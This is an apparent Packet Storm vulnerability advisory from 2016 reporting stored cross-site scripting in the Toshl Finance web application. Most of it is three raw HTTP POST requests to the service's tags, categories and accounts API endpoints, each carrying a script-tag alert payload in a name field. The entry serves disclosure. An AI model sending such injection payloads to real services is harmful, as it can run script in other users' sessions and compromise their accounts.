Toshl Finance Web Application Cross Site Scripting

2016-06-25T00:00:00
ID PACKETSTORM:137640
Type packetstorm
Reporter Brett DeWall
Modified 2016-06-25T00:00:00

Description

# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)  
# Date: 6/24/16  
# Exploit Author: Brett DeWall  
# Exploit Author Twitter: @xbadbiddyx   
# Exploit Author Blog: http://xbadbiddyx.tumblr.com  
# Vendor Homepage: https://toshl.com/app/  
# Version: Latest commit  
# Contacted Vendor Date: 6/18/16  
  
  
### Vulnerable Area #1  
Request  
POST /api/tags?immediate_update=true HTTP/1.1  
Host: toshl.com  
  
{"type":"expense","name":"<script>alert('Vulnerable to XSS')</script>","category":"51076972"}  
  
  
### Vulnerable Area #2  
Request  
POST /api/categories HTTP/1.1  
Host: toshl.com  
  
{"type":"income","name":"<script>alert('Vulnerable to XSS')</script>"}  
  
  
### Vulnerable Area #3  
POST /api/accounts HTTP/1.1  
Host: toshl.com  
  
{"name":"<script>alert('Vulnerable to XSS')</script>","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}  